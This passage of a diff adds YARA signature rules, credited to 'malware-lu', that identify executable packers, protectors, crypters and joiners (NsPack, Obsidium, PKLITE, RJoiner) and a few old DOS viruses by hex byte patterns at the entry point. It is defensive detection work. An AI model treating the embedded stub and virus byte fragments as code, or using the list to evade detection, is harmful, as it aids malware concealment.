+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Elanguage
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 06 00 00 00 50 E8 ?? 01 00 00 55 8B EC 81 C4 F0 FE FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXELOCK66615
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? BF ?? ?? EB ?? EA ?? ?? ?? ?? 79 ?? 7F ?? 7E ?? 1C ?? 48 78 ?? E3 ?? 45 14 ?? 5A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AdysGluev010
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E 8C 06 ?? ?? 0E 07 33 C0 8E D8 BE ?? ?? BF ?? ?? FC B9 ?? ?? 56 F3 A5 1E 07 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv132
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv114v115v1203
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B ?? ?? ?? 72 ?? B4 09 BA ?? 01 CD 21 CD 20 4E 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SafeGuardV10Xsimonzh2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 EB 29 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 9C 81 C1 E2 FF FF FF EB 01 ?? 9D FF E1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev102v103DLLBoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild023GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E1 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivatePersonalPackerPPP102ConquestOfTroycom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9 }
+
+condition:
+		$a0
+}
+	
+	
+rule DIETv102bv110av120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? 3B FC 72 ?? B4 4C CD 21 FD F3 A5 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXECLiPSElayer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1334ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }
+	$a1 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PKLITEv150Devicedrivercompression
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 09 BA 14 01 CD 21 B8 00 4C CD 21 F8 9C 50 53 51 52 56 57 55 1E 06 BB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGrazie883
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 0E 1F 50 06 BF 70 03 B4 1A BA 70 03 CD 21 B4 47 B2 00 BE 32 04 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PROTECTEXECOMv60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E B4 30 CD 21 3C 02 73 ?? CD 20 BE ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorSukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 6E 69 67 6D 61 20 70 72 6F 74 65 63 74 6F 72 20 76 31 }
+
+condition:
+		$a0
+}
+	
+	
+rule CRYPToCRACksPEProtectorV093LukasFleischer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv147v150
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 5B 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PocketPCMIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 FF BD 27 14 00 BF AF 18 00 A4 AF 1C 00 A5 AF 20 00 A6 AF 24 00 A7 AF ?? ?? ?? 0C 00 00 00 00 18 00 A4 8F 1C 00 A5 8F 20 00 A6 8F ?? ?? ?? 0C 24 00 A7 8F ?? ?? ?? 0C 25 20 40 00 14 00 BF 8F 08 00 E0 03 18 00 BD 27 ?? FF BD 27 18 00 ?? AF ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4ExtractableVirusShield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 40 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNoon1163
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5B 50 56 B4 CB CD 21 3C 07 ?? ?? 81 ?? ?? ?? 2E ?? ?? 4D 5A ?? ?? BF 00 01 89 DE FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PuNkMoD1xPuNkDuDe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 94 B9 ?? ?? 00 00 BC ?? ?? ?? ?? 80 34 0C }
+
+condition:
+		$a0
+}
+	
+	
+rule PECrypt32Consolev10v101v102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev2018
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 73 71 FF FF E8 DA 85 FF FF E8 81 A7 FF FF E8 C8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Nakedbind10nakedcrew
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B 4D 5A 74 08 81 EB 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV31LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiVirusVaccinev103
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 33 DB B9 ?? ?? 0E 1F 33 F6 FC AD 35 ?? ?? 03 D8 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKuku448
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { AE 75 ED E2 F8 89 3E ?? ?? BA ?? ?? 0E 07 BF ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv12xNewStrain
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimpleUPXCryptorv3042005OnelayerencryptionMANtiCORE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote10Demo12SISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 09 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 DB 01 47 65 74 56 65 72 73 69 6F 6E 45 78 41 00 73 01 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 00 7A 03 57 61 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 00 BF 02 52 65 73 75 6D 65 54 68 72 65 61 64 00 00 29 03 53 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 94 03 57 72 69 74 65 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 00 6B 03 56 69 72 74 75 61 6C 41 6C 6C 6F 63 45 78 00 00 A6 02 52 65 61 64 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 CA 01 47 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 62 00 43 72 65 61 74 65 50 72 6F 63 65 73 73 41 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngbartxtWinRARSFX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }
+	$a1 = { EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule BJFntv11b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded26202623Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB AC 1E 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 21 00 00 68 C4 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtector11xSLVICU
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RJoinerbyVaskaSignfrompinch250320071700
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 6C 10 40 00 FF 25 70 10 40 00 FF 25 74 10 40 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AverCryptor10os1r1s
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 75 17 40 00 8B BD 9C 18 40 00 8B 8D A4 18 40 00 B8 BC 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 A0 18 40 00 33 C0 51 33 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 A0 18 40 00 8B 85 A8 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 BC 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 98 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nSpackV23LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 70 61 63 6B 24 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule SENDebugProtector
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 29 ?? ?? 4E E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule xPEP03xxIkUg
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 53 56 51 52 57 E8 16 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote14SESISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 90 03 00 00 E8 C6 FD FF FF 68 90 03 00 00 E8 BC FD FF FF 68 90 03 00 00 E8 B2 FD FF FF 50 E8 AC FD FF FF 50 E8 A6 FD FF FF 68 69 D6 00 00 E8 9C FD FF FF 50 E8 96 FD FF FF 50 E8 90 FD FF FF 83 C4 20 E8 78 FF FF FF 84 C0 74 4F 68 04 01 00 00 68 10 22 60 00 6A 00 FF 15 08 10 60 00 68 90 03 00 00 E8 68 FD FF FF 68 69 D6 00 00 E8 5E FD FF FF 50 E8 58 FD FF FF 50 E8 52 FD FF FF E8 DD FE FF FF 50 68 A4 10 60 00 68 94 10 60 00 68 10 22 60 00 E8 58 FD FF FF 83 C4 20 33 C0 C2 10 00 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPack30NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ORiENV212FisunAV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5D 01 00 00 CE D1 CE CD 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackv23NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }
+	$a1 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule ObsidiumV1342ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SplashBitmapv100WithUnpackCodeBoBBobsoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBySV028shoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV12XObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV13LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PENinja131Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1300ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }
+	$a1 = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Feokt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 89 25 A8 11 40 00 BF ?? ?? ?? 00 31 C0 B9 ?? ?? ?? 00 29 F9 FC F3 AA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTkrnlSecureSuite01015NTkrnlSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEPROTECT09
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 CF 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXERefactorV01random
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 90 0B 00 00 53 56 57 E9 58 8C 01 00 55 53 43 41 54 49 4F 4E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 E9 06 ?? ?? 89 85 E1 06 ?? ?? FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 }
+
+condition:
+		$a0
+}
+	
+	
+rule NullsoftPIMPInstallSystemv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 5C 53 55 56 57 FF 15 ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah100byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 58 60 E8 00 00 00 00 5D 81 ED 20 25 40 00 8B BD 86 25 40 00 8B 8D 8E 25 40 00 6B C0 05 83 F0 04 89 85 92 25 40 00 83 F9 00 74 2D 81 7F 1C AB 00 00 00 75 1E 8B 77 0C 03 B5 8A 25 40 00 31 C0 3B 47 10 74 0E 50 8B 85 92 25 40 00 30 06 58 40 46 EB ED 83 C7 28 49 EB CE 8B 85 82 25 40 00 89 44 24 1C 61 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule dUP2diablo2oo2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 3C 01 75 19 BE ?? ?? ?? ?? 68 00 02 00 00 56 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01ASPack2xxHeuristicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXpressorv145CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule hmimysProtectv10
+{
+      meta:
+		author="malware-lu"
+strings:
